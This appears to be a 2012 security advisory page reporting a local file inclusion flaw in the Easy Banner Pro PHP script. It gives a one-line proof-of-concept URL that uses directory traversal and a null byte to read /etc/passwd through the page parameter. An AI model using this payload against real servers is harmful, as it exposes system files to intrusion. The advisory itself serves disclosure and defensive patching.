Easy Banner Pro Local File Inclusion

2012.08.25
Credit: Yakir Wizman
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-98

----------------------------------------------------------- Easy Banner Pro (index.php page) Local file inclusion Bug discovered by Yakir Wizman Date 24/08/2012 Vendor Homepage - http://www.phpwebscripts.com/easybannerpro/ Demo - http://www.scripts-demo.com/easybannerpro/ ISRAEL ----------------------------------------------------------- Author will be not responsible for any damage. ----------------------------------------------------------- About the Application ----------------------------------------------------------- Easy Banner Pro is an advanced and very easy to use PHP script for running your own banner exchange system. Proof Of Conecpt ----------------------------------------------------------- Local file inclusion (Severity is high) Vulnerable URL : http://server/easybannerpro/index.php?page=../../../../../../../../../../etc/passwd%00

References:

http://www.scripts-demo.com/easybannerpro/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top